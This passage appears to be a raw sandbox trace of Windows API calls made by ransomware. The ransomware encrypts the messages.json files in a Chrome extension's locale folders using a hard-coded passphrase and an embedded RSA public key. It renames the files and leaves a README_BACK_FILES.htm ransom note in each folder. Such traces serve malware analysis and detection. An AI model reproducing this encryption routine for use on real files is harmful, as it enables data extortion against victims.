MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0257.118] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.119] GetFileType (hFile=0x5d50) returned 0x1 [0257.119] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.120] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.120] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.120] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.120] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.120] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.121] GetLastError () returned 0x0 [0257.121] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json")) returned 0x20 [0257.121] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json", dwFileAttributes=0x80) returned 1 [0257.121] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.122] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.123] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.123] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.125] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.125] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.125] CryptHashData (hHash=0x2e18128, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.125] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.125] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.125] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.125] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e14538) returned 1 [0257.126] CryptImportPublicKeyInfo (in: hCryptProv=0x2e14538, dwCertEncodingType=0x1, pInfo=0x2e2ab30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2ab60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2ab68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19ce8) returned 1 [0257.126] CryptEncrypt (in: hKey=0x2e19ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.126] CryptEncrypt (in: hKey=0x2e19ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e14a00*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e14a00*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.126] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e14a00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e14a00*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.127] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xac, lpOverlapped=0x0) returned 1 [0257.128] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xac, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb0) returned 1 [0257.128] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0257.128] CloseHandle (hObject=0x5d5c) returned 1 [0257.128] CloseHandle (hObject=0x5d60) returned 1 [0257.128] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json"), bFailIfExists=0) returned 1 [0257.131] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json", dwFileAttributes=0x0) returned 1 [0257.132] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json.gsg")) returned 1 [0257.133] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\messages.json.fuck")) returned 1 [0257.134] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.134] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.134] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.134] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.134] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.134] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\readme_back_files.htm")) returned 0xffffffff [0257.134] AreFileApisANSI () returned 1 [0257.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3af0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.134] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.135] GetFileType (hFile=0x5d50) returned 0x1 [0257.135] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.136] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.136] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.136] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.136] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.136] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.136] GetLastError () returned 0x0 [0257.136] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json")) returned 0x20 [0257.136] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json", dwFileAttributes=0x80) returned 1 [0257.144] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.145] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.146] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.147] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.149] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.149] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.149] CryptHashData (hHash=0x2e18128, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.149] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.149] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.149] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.149] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e14a88) returned 1 [0257.150] CryptImportPublicKeyInfo (in: hCryptProv=0x2e14a88, dwCertEncodingType=0x1, pInfo=0x2e2b0e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2b110*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2b118*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19da8) returned 1 [0257.150] CryptEncrypt (in: hKey=0x2e19da8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.150] CryptEncrypt (in: hKey=0x2e19da8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e14b10*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e14b10*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.150] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e14b10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e14b10*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.151] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x11e, lpOverlapped=0x0) returned 1 [0257.153] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x11e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0257.153] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0257.153] CloseHandle (hObject=0x5d60) returned 1 [0257.153] CloseHandle (hObject=0x5d5c) returned 1 [0257.153] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json"), bFailIfExists=0) returned 1 [0257.156] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json", dwFileAttributes=0x0) returned 1 [0257.156] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json.gsg")) returned 1 [0257.157] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\messages.json.fuck")) returned 1 [0257.158] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.158] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.158] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.158] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.158] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.158] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\readme_back_files.htm")) returned 0xffffffff [0257.158] AreFileApisANSI () returned 1 [0257.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.158] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.159] GetFileType (hFile=0x5d50) returned 0x1 [0257.159] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.160] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.160] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.161] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.161] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.161] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.161] GetLastError () returned 0x0 [0257.161] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json")) returned 0x20 [0257.161] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json", dwFileAttributes=0x80) returned 1 [0257.162] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.162] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 